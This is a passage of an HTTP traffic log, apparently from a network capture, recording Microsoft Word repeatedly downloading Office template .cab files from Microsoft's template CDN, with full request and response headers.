X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31605
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: ae2zv4HJn+ipS7oDQIxa4Q==
Last-Modified: Fri, 22 Apr 2016 16:09:39 GMT
ETag: 0x8D36AC8822FFB6E
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: cb58b91a-201e-00f4-4797-a041dc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp1000111403.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 953453
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 1OrACenntkuLABroK4EC+g==
Last-Modified: Thu, 12 Jul 2018 00:20:10 GMT
ETag: 0x8D5E78D3A9D8C97
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: faf4e13b-801e-0036-5697-a0075a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp02851221.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31562
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: HW+Oc6BmKkjTMgkKTIyJjw==
Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
ETag: 0x8D36AC499FED5FF
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: dacba60e-401e-0105-7097-a08a43000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0403393701.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 3256855
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: iGe99fx1Tanab1ujQTNFlQ==
Last-Modified: Wed, 29 Aug 2018 18:19:39 GMT
ETag: 0x8D60DDBFC361FBC
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a1f8b712-201e-001a-6997-a01706000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328884.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 22008
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: q78QzulIDkHYEnfpU4+Yyw==
Last-Modified: Fri, 22 Apr 2016 15:41:56 GMT
ETag: 0x8D36AC4A2F6A8CC
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ff55c4dd-c01e-0039-0797-a078cd000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp02851217.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 33610
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: UYBOJVxXMXYDn01bVcEqsg==
Last-Modified: Fri, 22 Apr 2016 16:09:38 GMT
ETag: 0x8D36AC881987151
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5c89f3d8-e01e-00a6-4d97-a03d34000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp02851222.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 28911
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: bXh7HiI9trkbaSOAYsyocg==
Last-Modified: Fri, 22 Apr 2016 16:09:41 GMT
ETag: 0x8D36AC8830E54C8
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a51313b9-e01e-0100-5597-a07427000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp02851218.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31835
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: kqgZ1DSoquosZfDMLzO7Og==
Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
ETag: 0x8D36AC4998BC504
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 76eac56c-801e-00f9-0d97-a0f289000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp1000111502.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 230916
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: k/qfd5Ugqy0irE6oZLe7NA==
Last-Modified: Thu, 12 Jul 2018 00:23:55 GMT
ETag: 0x8D5E78DC0BDFFD8
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4fca6d0a-e01e-006a-5297-a064c2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp02851224.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 30957
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 08kDbk4RWegysbTS6dQr8A==
Last-Modified: Fri, 22 Apr 2016 15:41:42 GMT
ETag: 0x8D36AC49A7FC9DF
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8e392da6-d01e-010b-4f97-a06648000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0345751501.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 222992
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: Jr6rnM6v5Pvwt8A2JoGp0g==
Last-Modified: Wed, 29 Aug 2018 18:20:49 GMT
ETag: 0x8D60DDC25D3B258
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2dfc7fe2-b01e-0132-7897-a026ec000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp02851223.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 32833
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: IFr1FgTvlu8ejmAhJUH3Qg==
Last-Modified: Fri, 22 Apr 2016 15:41:42 GMT
ETag: 0x8D36AC49A4270D3
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a445c8ca-501e-00f0-1697-a0e807000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp02851226.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 35519
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: U+6dpJ0LhDVwOOzzdoONLg==
Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
ETag: 0x8D36AC88440C433
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2e8ae1bb-901e-00ce-4f97-a05ba4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp02851225.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31008
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 4DPMvHunh6L4JM4JUuV9RA==
Last-Modified: Fri, 22 Apr 2016 16:09:42 GMT
ETag: 0x8D36AC883F49D7D
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 333d895c-301e-008a-7b97-a0d19b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp02851227.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31471
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: karb7EFxz6gpK2GEkvXvNA==
Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
ETag: 0x8D36AC8848A0495
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 13033484-101e-00ef-6b97-a07fdf000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0309043001.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 307348
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: DrxFqg5nzENdB0VDg3H5SA==
Last-Modified: Wed, 29 Aug 2018 18:20:24 GMT
ETag: 0x8D60DDC16D93762
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6b95f26a-601e-0143-7d97-a0927b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp02835233.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 46413
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: xFXEvEvsng2mfE0eU+RtWg==
Last-Modified: Fri, 22 Apr 2016 15:41:34 GMT
ETag: 0x8D36AC4959B7E4C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2ef43144-a01e-0126-5097-a0e588000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0345751001.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 1065873
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 4RAcym4/7bKLV69MQbUNNw==
Last-Modified: Wed, 29 Aug 2018 18:15:37 GMT
ETag: 0x8D60DDB6BA6E455
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 035d76e5-001e-0155-6297-a064ac000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0309043402.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 723359
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: dIpTxr3Vzpe9VKdsejNChg==
Last-Modified: Wed, 29 Aug 2018 18:14:28 GMT
ETag: 0x8D60DDB424DEB76
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6df36025-a01e-0066-4397-a08a33000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328905.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 20457
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: TvpI7DB+ry+bNGoHPGf8+w==
Last-Modified: Fri, 22 Apr 2016 16:09:46 GMT
ETag: 0x8D36AC886167DDF
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 66a5b05a-401e-0074-0597-a0beda000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0403392901.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 1766185
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: go+WAx9Av468teUqrut+TA==
Last-Modified: Wed, 29 Aug 2018 18:21:39 GMT
ETag: 0x8D60DDC4354B7FB
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ec9a4660-301e-00c7-1297-a01e77000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328893.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 20235
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 48ZBc7L0qnq3LhOWqVFL2A==
Last-Modified: Fri, 22 Apr 2016 15:41:57 GMT
ETag: 0x8D36AC4A3175138
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3d2d7caf-b01e-0050-2697-a02761000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328908.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31083
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: iamBjmZY1zpztkJSL/hwHw==
Last-Modified: Fri, 22 Apr 2016 15:41:40 GMT
ETag: 0x8D36AC498DE687B
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
